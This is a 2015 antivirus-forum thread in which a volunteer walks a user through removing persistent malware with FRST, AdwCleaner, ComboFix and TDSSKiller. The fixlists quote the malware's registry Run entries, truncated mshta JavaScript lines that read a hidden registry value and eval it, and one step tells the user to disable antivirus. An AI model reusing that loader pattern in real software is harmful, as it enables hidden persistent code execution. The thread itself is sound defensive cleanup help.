Author Topic: Infection blocked Constant messages.  (Read 10422 times)

0 Members and 1 Guest are viewing this topic.

REDACTED

  • Guest
Infection blocked Constant messages.
« on: July 23, 2015, 09:14:18 PM »
I keep getting the above. The message containes these:

URL: http://filter.infinity-info.com/filter?q=%7Bquery&i=qsgAPfw0I1o_1&t=1204682193

Infection: URL:Mal2

Process: C:\Program Files\Internet Explorer\iexplore.exe

I have run Full Scan & Boot time scans. I uninstalled Internet Explorer from day one and even delete the contents of the Internet Explorer folder mentioned in the message bar for 2 dlls - ieproxy.dll & sqmapi.dll which I have been unable to remove even after taking ownership of them.

Would appreciate some advice on how to stop this nightmare. First time ever in many years of Avast use that I've
encountered such an issue.

Thanks

Joaquin

Offline essexboy

  • Malware removal instructor
  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 40589
  • Dragons by Sasha
    • Malware fixes
Re: Infection blocked Constant messages.
« Reply #1 on: July 23, 2015, 09:19:13 PM »
Could you screenshot the Avast popup please

Please download Farbar Recovery Scan Tool and save it to your Desktop.
 
Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.
 
  • Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
  • Select  additions at the bottom
  • Press Scan button.

  • It will produce a log called FRST.txt in the same directory the tool is run from. 
  • Please attach both logs generated.

REDACTED

  • Guest
Re: Infection blocked Constant messages.
« Reply #2 on: July 24, 2015, 10:45:53 PM »
Sorry for the delay getting back.
Logs and screenshot attached.

Thanks


Joaquin
« Last Edit: July 25, 2015, 08:15:04 PM by skywreck »

Offline essexboy

  • Malware removal instructor
  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 40589
  • Dragons by Sasha
    • Malware fixes
Re: Infection blocked Constant messages.
« Reply #3 on: July 24, 2015, 11:15:26 PM »
This probably cam from one of your torrented movies

CAUTION :  This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:
 
Quote
CreateRestorePoint:
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [**7963cd85<*>] => mshta javascript:cWaIf4Z="q7";I6X=new%20ActiveXObject("WScript.Shell");Yim1jLRE8="2DzVW7p1";q7ti3T=I6X.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");CxM0MaI0="p";eval(q7ti3T);Wn3p0erZkM (the data entry has 13 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM-x32\...\Run: [**7963cd85<*>] => mshta javascript:cWaIf4Z="q7";I6X=new%20ActiveXObject("WScript.Shell");Yim1jLRE8="2DzVW7p1";q7ti3T=I6X.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");CxM0MaI0="p";eval(q7ti3T);Wn3p0erZkM (the data entry has 13 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM\...\Policies\Explorer\Run: [**aefe7890<*>] => mshta javascript:LDvUT1uG="J4";bq3=new%20ActiveXObject("WScript.Shell");zKSEG9Se="hlG5kdljkX";Dc3K0E=bq3.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");klTB8VpgQ="q";eval(Dc3K0E);K5cW9em (the data entry has 14 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1306190550-1966074902-702322317-1000\...\Run: [EEDSpeedLauncher] => rundll32.exe C:\Windows\system32\eed_ec.dll,SpeedLauncher
HKU\S-1-5-21-1306190550-1966074902-702322317-1000\...\Run: [**7963cd85<*>] => mshta javascript:WmyABn1BA0="YGDl";wN7=new%20ActiveXObject("WScript.Shell");Lpi4jqN4="UY3";qC4sm2=wN7.RegRead("HKCU\\software\\3ba89a97d2\\7d1deee2");TVDlVH1="BVV88jRnqS";eval(qC4sm2);QSLnTBa8F="ZfZml (the data entry has 6 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.mystartsearch.com/?type=hppp&ts=1423696213&from=smt&uid=WDCXWD1002FAEX-00Z3A0_WD-WCATR862249322493
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.mystartsearch.com/web/?type=dspp&ts=1423696213&from=smt&uid=WDCXWD1002FAEX-00Z3A0_WD-WCATR862249322493&q={searchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.mystartsearch.com/web/?type=dspp&ts=1423696213&from=smt&uid=WDCXWD1002FAEX-00Z3A0_WD-WCATR862249322493&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope value is missing
SearchScopes: HKU\S-1-5-21-1306190550-1966074902-702322317-1000 -> {2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0} URL = http://www.mystartsearch.com/web/?utm_source=b&utm_medium=smt&utm_campaign=install_ie&utm_content=ds&from=smt&uid=WDCXWD1002FAEX-00Z3A0_WD-WCATR862249322493&ts=1423696235&type=default&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1306190550-1966074902-702322317-1000 -> {B1C519C5-8E0B-4901-8A28-C3DEDC5AC32E} URL = http://www.mystartsearch.com/web/?utm_source=b&utm_medium=smt&utm_campaign=install_ie&utm_content=ds&from=smt&uid=WDCXWD1002FAEX-00Z3A0_WD-WCATR862249322493&ts=1423696235&type=default&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1306190550-1966074902-702322317-1000 -> {E733165D-CBCF-4FDA-883E-ADEF965B476C} URL = http://www.mystartsearch.com/web/?utm_source=b&utm_medium=smt&utm_campaign=install_ie&utm_content=ds&from=smt&uid=WDCXWD1002FAEX-00Z3A0_WD-WCATR862249322493&ts=1423696235&type=default&q={searchTerms}
Toolbar: HKU\S-1-5-21-1306190550-1966074902-702322317-1000 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
Toolbar: HKU\S-1-5-21-1306190550-1966074902-702322317-1000 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
U3 aiiiti6k; C:\Windows\System32\Drivers\aiiiti6k.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
DeleteKey: HKLM\software\Wow6432Node\3ba89a97d2
DeleteKey: HKCU\software\3ba89a97d2
RemoveProxy:
EmptyTemp:
CMD: bitsadmin /reset /allusers

 
Save this as fixlist.txt, in the same location as FRST.exe

Run FRST and press Fix
On completion a log will be generated please post that

REDACTED

  • Guest
Re: Infection blocked Constant messages.
« Reply #4 on: July 25, 2015, 01:48:21 AM »
Thanks for your help. I did as instructed and the log is attached. However pop up continue.

Joaquin

Offline essexboy

  • Malware removal instructor
  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 40589
  • Dragons by Sasha
    • Malware fixes
Re: Infection blocked Constant messages.
« Reply #5 on: July 25, 2015, 12:29:42 PM »
Could I have a fresh FRST scan please

Please download AdwCleaner by Xplode onto your desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click on Scan.
  • After the scan is complete click on "Clean"
  • Confirm each time with Ok.
  • Your computer will be rebooted automatically. A text file will open after the restart.
  • Please post the content of that logfile with your next answer.
  • You can find the logfile at C:\AdwCleaner[S0].txt as well.

REDACTED

  • Guest
Re: Infection blocked Constant messages.
« Reply #6 on: July 26, 2015, 10:18:42 AM »
Done as instructed. See attached.

Much obliged for your help with all this.

Regards


Joaquin

Pop ups continue.
« Last Edit: July 26, 2015, 12:15:03 PM by skywreck »

Offline essexboy

  • Malware removal instructor
  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 40589
  • Dragons by Sasha
    • Malware fixes
Re: Infection blocked Constant messages.
« Reply #7 on: July 26, 2015, 12:27:15 PM »
Hmm the exact same infection is showing, lets try once more

CAUTION :  This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:
 
Quote
CreateRestorePoint:
HKLM-x32\...\Run: [**7963cd85<*>] => mshta javascript:MM6YG3zKFz="UqC9I";m8g2=new%20ActiveXObject("WScript.Shell");GGMcA9Lr="uTNbxYW";RdsV89=m8g2.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");akfWMd2lF="4xtLoV7";eval(RdsV8 (the data entry has 19 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM\...\Policies\Explorer\Run: [**aefe7890<*>] => mshta javascript:CY92tCCLnU="Oxlq5";k89k=new%20ActiveXObject("WScript.Shell");D1vHYMFcu="Vs";HUX4o5=k89k.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");q8CxhVuml="ox";eval(HUX4o5);WPSGc5 (the data entry has 10 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1306190550-1966074902-702322317-1000\...\Run: [**7963cd85<*>] => mshta javascript:KW3zbLY="Ecdu260TGk";c8K1=new%20ActiveXObject("WScript.Shell");VoHdg6jDS="ckvS2tBx";w1SX4s=c8K1.RegRead("HKCU\\software\\3ba89a97d2\\7d1deee2");NK6ft7kv="xoUxfLX7m";eval(w1SX4s);gP22F (the data entry has 19 more characters). <===== ATTENTION (Value Name with invalid characters)
U3 ar5yet3c; C:\Windows\System32\Drivers\ar5yet3c.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
HKU\S-1-5-21-1306190550-1966074902-702322317-1000\...\Run: [Amazon Music] => C:\Users\ideoplastic\AppData\Local\Amazon Music\Amazon Music Helper.exe [5887808 2015-07-21] ()
DeleteKey: HKLM\software\Wow6432Node\3ba89a97d2
DeleteKey: HKCU\software\3ba89a97d2
RemoveProxy:
EmptyTemp:
CMD: bitsadmin /reset /allusers

 
Save this as fixlist.txt, in the same location as FRST.exe

Run FRST and press Fix
On completion a log will be generated please post that

THEN

Download and Install Combofix
 
Download ComboFix from one of the following locations:
Link 1
Link 2
 
VERY IMPORTANT !!! Save ComboFix.exe to your Desktop
 
* IMPORTANT - Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools. If you have difficulty properly disabling your protective programs, refer to this link here
  • Double click on ComboFix.exe & follow the prompts.
  • Accept the disclaimer and allow to update if it asks




  • When finished, it shall produce a log for you.
  • Please include the C:\ComboFix.txt in your next reply.[/b]
Notes:
1. Do not mouse-click Combofix's window while it is running. That may cause it to stall.
2. Do not "re-run" Combofix. If you have a problem, reply back for further instructions.

3.  If after the reboot you get errors about programmes being marked for deletion then reboot, that will cure it.


Please make sure you include the combo fix log in your next reply as well as describe how your computer is running now

REDACTED

  • Guest
Re: Infection blocked Constant messages.
« Reply #8 on: July 26, 2015, 03:16:04 PM »
Followed the instructions to the letter. Did a FSRT scan and log file attached. Then ran ComboFix which scanned and then rebooted after completion, on returning to the Desktop another window opened and started to create a log file, unfortunately it came up with an error because of disk error, damaged or something like that. I was unable to take a screenshot because my was sort of frozen and had to reboot once more. I've only had one pop up for the last hour or so.

Offline essexboy

  • Malware removal instructor
  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 40589
  • Dragons by Sasha
    • Malware fixes
Re: Infection blocked Constant messages.
« Reply #9 on: July 26, 2015, 03:17:52 PM »
OK could I have a fresh FRST scan please so that I can be sure the malware has gone

REDACTED

  • Guest
Re: Infection blocked Constant messages.
« Reply #10 on: July 26, 2015, 03:32:14 PM »
Still getting pop-ups

Attached screenshot of pop-up and new Scan.

Offline essexboy

  • Malware removal instructor
  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 40589
  • Dragons by Sasha
    • Malware fixes
Re: Infection blocked Constant messages.
« Reply #11 on: July 26, 2015, 04:34:01 PM »
OK the only thing I can think of at the moment is that an MBR type rootkit is re-installing after I am removing it

So I will check that out.  Are you downloading anything after running the FRST fix ?

Download the latest version of TDSSKiller from here and save it to your Desktop.
 
 
  • Doubleclick on TDSSKiller.exe to run the application


  • Then click on Change parameters.
     

     
  • Check the boxes beside Verify Driver Digital Signature, Detect TDLFS file system  and Use KSN to scan objects , then click OK.
     
  • Click the Start Scan button.
     
     
  • If a suspicious object is detected, the default action will be Skip, click on Continue.
     

     
  • If malicious objects are found, they will show in the Scan results and offer three (3) options.
  • Ensure Cure is selected, then click Continue => Reboot now to finish the cleaning process.

  • Get the report by selecting Reports

 
  • Note: If Cure is not available, please choose Skip instead, do not choose Delete unless instructed.
Please copy and paste its contents on your next reply.

REDACTED

  • Guest
Re: Infection blocked Constant messages.
« Reply #12 on: July 26, 2015, 05:24:21 PM »
Nothing found but a pop up came up while it was scanning. - Probably best thing for me is to back-up and rebuild.

Extremely greatful for your help. If you were really in Essex I'd buy a pint!

Bests


Joaquin

Offline essexboy

  • Malware removal instructor
  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 40589
  • Dragons by Sasha
    • Malware fixes
Re: Infection blocked Constant messages.
« Reply #13 on: July 26, 2015, 05:59:47 PM »
Do you have anything on your system that is protecting the registry as that is where the malware is hiding

REDACTED

  • Guest
Re: Infection blocked Constant messages.
« Reply #14 on: July 26, 2015, 10:21:18 PM »
Sorry for the delay. I checked the services and Windows Defender was active so I switched it off, ran Adwcleaner followed by Combofix and after the reboots no more pop ups. All going well for a number of hours.

Thanks


Joaquin